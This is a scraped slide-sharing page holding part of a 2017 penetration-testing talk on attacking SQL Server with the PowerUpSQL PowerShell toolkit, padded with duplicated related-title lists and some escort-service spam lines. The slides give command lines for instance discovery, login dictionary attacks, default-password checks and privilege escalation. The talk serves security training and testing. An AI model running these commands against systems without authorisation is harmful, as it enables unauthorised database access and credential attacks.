WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Security testing
Security testingSecurity testing
Security testing
 
DDoS 방어를 위한 Cloudflare 활용법
DDoS 방어를 위한 Cloudflare 활용법DDoS 방어를 위한 Cloudflare 활용법
DDoS 방어를 위한 Cloudflare 활용법
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Cisco Ironport WSA- Introduction and Guide in Short
Cisco Ironport WSA-  Introduction and Guide in ShortCisco Ironport WSA-  Introduction and Guide in Short
Cisco Ironport WSA- Introduction and Guide in Short
 
Burp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionBurp Suite v1.1 Introduction
Burp Suite v1.1 Introduction
 
F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
 

Similaire à Hacking SQL Server on Scale with PowerShell

2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
MySQL crash course by moshe kaplan
MySQL crash course by moshe kaplanMySQL crash course by moshe kaplan
MySQL crash course by moshe kaplanMoshe Kaplan
 
Brief introduction into SQL injection attack scenarios
Brief introduction into SQL injection attack scenariosBrief introduction into SQL injection attack scenarios
Brief introduction into SQL injection attack scenariosPayampardaz
 
Flash And The City 2010
Flash And The City 2010Flash And The City 2010
Flash And The City 2010Steven Peeters
 
Dealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NETDealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NETFernando G. Guerrero
 
Dealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NETDealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NETFernando G. Guerrero
 
Introduction to MariaDb
Introduction to MariaDbIntroduction to MariaDb
Introduction to MariaDbBehzadDara
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
Automating your php infrastructure with the zend server api
Automating your php infrastructure with the zend server apiAutomating your php infrastructure with the zend server api
Automating your php infrastructure with the zend server apiYonni Mendes
 
Introduction to PowerShell - Be a PowerShell Hero - SPFest workshop
Introduction to PowerShell - Be a PowerShell Hero - SPFest workshopIntroduction to PowerShell - Be a PowerShell Hero - SPFest workshop
Introduction to PowerShell - Be a PowerShell Hero - SPFest workshopMichael Blumenthal (Microsoft MVP)
 
Puppet Camp Charlotte 2015: Exporting Resources: There and Back Again
Puppet Camp Charlotte 2015: Exporting Resources: There and Back AgainPuppet Camp Charlotte 2015: Exporting Resources: There and Back Again
Puppet Camp Charlotte 2015: Exporting Resources: There and Back AgainPuppet
 
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...SpanishPASSVC
 
Chapter 3 overview
Chapter 3 overviewChapter 3 overview
Chapter 3 overviewali raza
 

Similaire à Hacking SQL Server on Scale with PowerShell (20)

2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
MySQL crash course by moshe kaplan
MySQL crash course by moshe kaplanMySQL crash course by moshe kaplan
MySQL crash course by moshe kaplan
 
Brief introduction into SQL injection attack scenarios
Brief introduction into SQL injection attack scenariosBrief introduction into SQL injection attack scenarios
Brief introduction into SQL injection attack scenarios
 
Flash And The City 2010
Flash And The City 2010Flash And The City 2010
Flash And The City 2010
 
Dealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NETDealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NET
 
Dealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NETDealing with SQL Security from ADO.NET
Dealing with SQL Security from ADO.NET
 
Introduction to MariaDb
Introduction to MariaDbIntroduction to MariaDb
Introduction to MariaDb
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
Automating your php infrastructure with the zend server api
Automating your php infrastructure with the zend server apiAutomating your php infrastructure with the zend server api
Automating your php infrastructure with the zend server api
 
Introduction to PowerShell - Be a PowerShell Hero - SPFest workshop
Introduction to PowerShell - Be a PowerShell Hero - SPFest workshopIntroduction to PowerShell - Be a PowerShell Hero - SPFest workshop
Introduction to PowerShell - Be a PowerShell Hero - SPFest workshop
 
Puppet Camp Charlotte 2015: Exporting Resources: There and Back Again
Puppet Camp Charlotte 2015: Exporting Resources: There and Back AgainPuppet Camp Charlotte 2015: Exporting Resources: There and Back Again
Puppet Camp Charlotte 2015: Exporting Resources: There and Back Again
 
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
24 HOP edición Español -Diferentes técnicas de administración de logins y usu...
 
Chapter 3 overview
Chapter 3 overviewChapter 3 overview
Chapter 3 overview
 

Plus de Scott Sutherland

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Scott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial EmulationScott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsScott Sutherland
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksScott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 

Plus de Scott Sutherland (15)

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 

Dernier

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Dernier (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

Hacking SQL Server on Scale with PowerShell

  • 1. Hacking SQL Server on Scale with PowerShell ____________________________________________________ 2017
  • 2. Speaker Information Name: Scott Sutherland Job: Network & Application Pentester @ NetSPI Twitter: @_nullbind Slides: http://slideshare.net/nullbind http://slideshare.net/netspi Blogs: https://blog.netspi.com/author/scott-sutherland/ Code: https://github.com/netspi/PowerUpSQL https://github.com/nullbind
  • 3. Presentation Overview ● PowerUpSQL Overview ● SQL Server Discovery ● Privilege Escalation Scenarios o Domain user to SQL Server login o SQL Server Login to Sysadmin o Sysadmin to Windows Admin o Windows Admin to Sysadmin o Domain Escalation ● Post Exploitation Activities ● General Recommendations
  • 4. Why SQL Server? ● Used in most enterprise environments ● Used by a lot of development teams ● Used by a lot of vendor solutions ● Supports Windows authentication both locally and on the domain ● Lots of integration with other Windows services and tools
  • 5. Why PowerShell? ● Native to Windows ● Run commands in memory ● Run managed .net code ● Run unmanaged code ● Avoid detection by Anti-virus ● Already flagged as "trusted" by most application whitelist solutions ● A medium used to write many open source Pentest toolkits
  • 8. PowerUpSQL Overview: Primary Goals ● Instance Discovery ● Auditing ● Exploitation ● Scalable ● Flexible ● Portable https://github.com/netspi/PowerUpSQL
  • 9. PowerUpSQL Overview: Functions Primary Attack Functions ● Invoke-SQLDumpInfo ● Invoke-SQLAudit ● Invoke-SQLEscalatePriv Popular Auxiliary Functions ● Get-SQLInstanceDomain ● Invoke-SQLOsCmd ● Invoke-SQLOsCLR ● Invoke-SQLImperstonateService ● Invoke-SQLAuditDefaultLoginPw ● Invoke-SQLAuditWeakLoginPw https://github.com/NetSPI/PowerUpSQL/wikiCurrently over 70 Functions
  • 10. PowerUpSQL Overview: Help? List Functions Get-Command –Module PowerUpSQL
  • 11. PowerUpSQL Overview: Help? Get Command Help Get-Help Get-SQLServerInfo -Full
  • 13. SQL Server Discovery: Techniques Attacker Perspective Attack Technique Unauthenticated ● List from file ● TCP port scan ● UDP port scan ● UDP ping of broadcast addresses ● Azure DNS dictionary attack (x.databases.windows.net) ● Azure DNS lookup via public resources Local User ● Services ● Registry entries Domain User ● Service Principal Names ● Azure Portal / PowerShell Modules
  • 14. SQL Server Discovery: PowerUpSQL Attacker Perspective PowerUpSQL Function Unauthenticated Get-SQLInstanceFile Unauthenticated Get-SQLInstanceUDPScan Local User Get-SQLInstanceLocal Domain User Get-SQLInstanceDomain Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
  • 16. Testing Login Access: PowerUpSQL Attacker Perspective Attack PowerUpSQL Function Example Unauthenticated Dictionary Attacks Invoke-SQLAuditWeakLoginPw –Instance “Server1Instance1” -UserFile c:tempusers.txt –PassFile C:tempPasswords.txt Unauthenticated Default Vendor Passwords Get-SQLInstanceFile C:tempComputers.txt | Select Computername | Get-SQLInstanceScanUDPThreaded –Verbose | Get-SQLServerLoginDefaultPw -Verbose Local User Excessive Login Priv Get-SQLInstance | Get-SQLConnectionTest -Verbose Domain Account Excessive Login Priv Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
  • 17. Testing Login Access: Default App Pw
  • 18. Testing Login Access: Reusing Results Process Command Example Enumerate Accessible Servers $Accessible = Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15 | Where-Object {$_.Status –like “Accessible”} Get server information $Acessible | Get-SQLServerInfo -Verbose Get database list $Acessible | Get-SQLDatabase -Verbose Perform audit $Acessible | Invoke-SQLAudit -Verbose Do I have to rerun instance discovery every time I want to run a command? No.
  • 19. Testing Login Access: DEMO Identifying Excessive Login Privileges as a Domain User
  • 21. Escalating Privileges: Domain User Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access ● SQL Server Express is commonly vulnerable ● A lot of 3rd party solutions are affected
  • 22. Escalating Privileges: Domain User Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access ● SQL Server Express is commonly vulnerable ● A lot of 3rd party solutions are affected
  • 23. Escalating Privileges: Domain User Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access ● SQL Server Express is commonly vulnerable ● A lot of 3rd party solutions are affected
